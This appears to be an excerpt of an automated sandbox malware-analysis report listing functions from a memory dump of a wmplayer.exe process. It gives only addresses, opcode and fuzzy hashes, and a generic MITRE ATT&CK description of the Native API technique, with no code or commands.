Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
Instruction ID: 8be5c78b239890a80854597e1f7b18bbdc3a361c01ffdf0308051dc7b24675dc
Opcode Fuzzy Hash: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
Instruction Fuzzy Hash: 02011AB4A00209DFDB04DFA9D545B9EF7F4FF08300F1482A9A519EB381EA74DA408B91

Function 0382C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
Instruction ID: a4009ef82eb35b03f96767027d7ea5ebd7d77acfe32c9b2e7e486fcc6f295dff
Opcode Fuzzy Hash: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
Instruction Fuzzy Hash: 44F024712043245BF760D6D99C02B763AAAEBC0750F2980EAEB05CF2C0FA70EC81C395

Function 038D437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: d887b10f1b2b6fa9c979053d0fc331dfcfcd96bcc4e643872593e0268f20c85a
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 37F05435341A1247DB7EFAEF9810E2FE3559FC0A50B4905AC9455CBE40DF70D8018791

Function 038EF3E6 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
Instruction ID: ca695dbb5a8e13d28bbd6fe42c0ab44116540cb035cb986b2af8780b64ffc6d9
Opcode Fuzzy Hash: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
Instruction Fuzzy Hash: 4AF03775A0124CEFCB04EFE9D545A9EB7F4EF48304F4080A9B945EB381E674EA01CB56

Function 038292FF Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
Instruction ID: 1ac8ab2c786f6bde5c93fb023f66ef8d84cfc15166e85a7ad9be4f2759058aef
Opcode Fuzzy Hash: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
Instruction Fuzzy Hash: DAF0FA32200744ABC731EB89DC08F9BBBEDEFC4B00F0801A9E942C3090C7A0A948C660

Function 038F0115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
Instruction ID: 5092f83974b846c82fe702aa16cae338330e8b776bb3447f30180f112e6c044f
Opcode Fuzzy Hash: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
Instruction Fuzzy Hash: DFF0A7BE41EBD44ECF32FBA86490291AF599757150F1D14C5C6A1DF607C9B488C3C725

Function 0390539D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
Instruction ID: f7d37a81ecd1a2d6bb42870b64de9fdec2245712d13025ce378b37cd2565dce0
Opcode Fuzzy Hash: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
Instruction Fuzzy Hash: 8EF0B474A1434CDFDB04EBB9D441F5DB7B4EF04300F108094E501EB280DAB4D901CB25

Function 03905283 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
Instruction ID: bd1298365fa938635cff3dc2e85bfcda3522feeee2576f970e336addee986f81
Opcode Fuzzy Hash: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
Instruction Fuzzy Hash: 7FF0BE78A14308EFDB04EBA9D901EAEB7F8BF04300F044498A441EB2C1EA74D9008B52

Function 039052E2 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
Instruction ID: 34aa2c24b242121dab6ebbb2683f0e7fee4112d6493c7397facc138765e2c59a
Opcode Fuzzy Hash: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
Instruction Fuzzy Hash: B3F0BE74A14348EFDB04EFB9E901E6EB3B8AF14300F044498A401EB2C0EAB4D900CB56

Function 03905341 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
Instruction ID: eb33f2b586155989a9b2eb6c022b79a4f429f232fbf620d46ace4b7bc60fe61f
Opcode Fuzzy Hash: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
Instruction Fuzzy Hash: 84F08274A0424CEFDB04EBB9D945E9EB7B8AF49244F540499A501EB2D0EA74D9008716

Function 03867208 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
Instruction ID: af852c923492f18ace13c5bf36b6c3d6b958bb557a0766985fb4f539f2e2d757
Opcode Fuzzy Hash: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
Instruction Fuzzy Hash: 8DF08275911A949FEB21D7AEC584B11B7D9AF40674F0D85E1D405CB741CBA8D880C691

Function 03905227 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
Instruction ID: c72107c20caf633633d0d7020f782b4b5ccaeaf530709fbd803f86cbc9f2b949
Opcode Fuzzy Hash: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
Instruction Fuzzy Hash: 94F08274A14348AFDB14EBEDD905E6EB3B8AF44704F050498A901EF2C1EA74D9008756

Function 039051CB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
Instruction ID: 8a707e462a568a5eff4fc079a8f600d90bc11caa508af1e79c98d0adf802d5cc
Opcode Fuzzy Hash: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
Instruction Fuzzy Hash: C6F08274A1524CEFDB04EBEDD905E6EB3B8EF04304F040499A901EF2C1EA74E900CB56

Function 038AD070 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
Instruction ID: 8793014b1322a47ae8f8d55b291f9f164c8a3f80408503e4d58c12b261459ae5
Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
Instruction Fuzzy Hash: 06F0A03260461467C220AA4D8C05F5AFBACDBD5B70F10425ABA24DA1D0DA60A911D7D6

Function 039037B6 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction ID: f05937ef5e747067ffac7c981f8dd09600cfc94ace041bb1866997ca3679e0a8
Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction Fuzzy Hash: B2E06D76210204AFE764DB58CD45FA673ACEB40760F180258B115D74D0DAB0AE40CA60

Function 038EB3D0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
Instruction ID: bbe2c8b107f27e94284c0d29f3d73aeba8dd42dbb1bf50b23a4651f4d0619076
Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
Instruction Fuzzy Hash: 21E0CD35244318B7DB23AA84CC00F797B55DB417D4F104071FA08DEA50C5B19D91D6D5

Function 0382823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: b25870bfe444b599086fdd8d512d4d6d98eb5999fa18ba7b863a6e29cdbbfa06
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: C6E08C35101B24EEDB31EFA9DC04B527AA6FF84B10F1448E9E0818A4A487B0A8D1DA45

Function 038B92BC Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
Instruction ID: 84c13dc5e1c49a843ec369c64f504abb87daa158796be71e8dcdaa5d47706f7f
Opcode Fuzzy Hash: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
Instruction Fuzzy Hash: 79F0E534655B84CFE72ADF48C1E2B91B3B9FB99B44F510498D4468FBB1C73AA942CA40

Function 03832050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
Instruction ID: f1f328b5338a2be32e7608f6baab5e55622000e0dec375486c370e2377e3e654
Opcode Fuzzy Hash: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
Instruction Fuzzy Hash: 35E0C2332006546BC321FB9DDD00F4A739EEFA5360F004161F150CFAA0CA60AC00C7D5

Function 0382A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: e6b1063d2d23711ac0d43cbc3afd2ae284f38cfe6b961503cde2a9b3389ba8ba
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 83D0223231213093CB2CE6D46800F63AD05AF80AA4F0A00AC380AD3800C8088C82C2E0

Function 038402A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: ee96871a9807210c57909f3e0db125cc446681f7a4e7b44fe69db62fd855efb2
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 5BD09275216A84CFD61BCB99C5A4B16B3A8BB44A48F8904D0E501CBB61D668D940CA00

Function 038B930B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction ID: 02adc4d58c16dd82ba9f7b28e4e257c22cca9a0d2903e5ba261f8b78f55aa8ac
Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction Fuzzy Hash: 68D05E35945AC4CFE727CB08C165B907BF8F749B40F8910D8E04287BA2C37C9984CB10

Function 03850310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 267725e476671269c30ec3208ccc00b4b1b5956bd80acb6486e1b78b6004f5b2
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 60D01236100248EFCB01DF85C890DDA772AFBD8710F148019FD190B6108A31ED62DA50

Function 03874340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
Instruction ID: 6158b953938e4fa65184f0695d7a8c08037a1e0db5d092e0d4ebae9a81823019
Opcode Fuzzy Hash: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
Instruction Fuzzy Hash: 97900231605804169140B29848C4586400697E0301BA5C051E1428558C8B148A5A5362

Function 03873090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
Instruction ID: 3d1187d38bc563b7cbd4c17935b5997db336238ece7132160f66065a62b4beee
Opcode Fuzzy Hash: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
Instruction Fuzzy Hash: 5490022124140C06D140B29884547470007C7D0701FA5C051A1028558D87168A6966B2

Function 03873010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
Instruction ID: 9338f67405f70701324fd1e09126289f1dfe839e626e3a3f6d771e9e89661978
Opcode Fuzzy Hash: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
Instruction Fuzzy Hash: 0F90022120184846D140B3984844B4F410687E1302FE5C059A515A558CCA1589595722

Function 03839126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03839175
$, xrefs: 03839191

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
Instruction ID: 0c82d0d49e48d688fc46f782253f15b9a9d859c4dd4245f2ce52013bc282fc4c
Opcode Fuzzy Hash: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
Instruction Fuzzy Hash: 3F811976D002699BDB31DF94CC44BEEB6B8AB08710F0445EAE919F7680D7709E84CFA1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

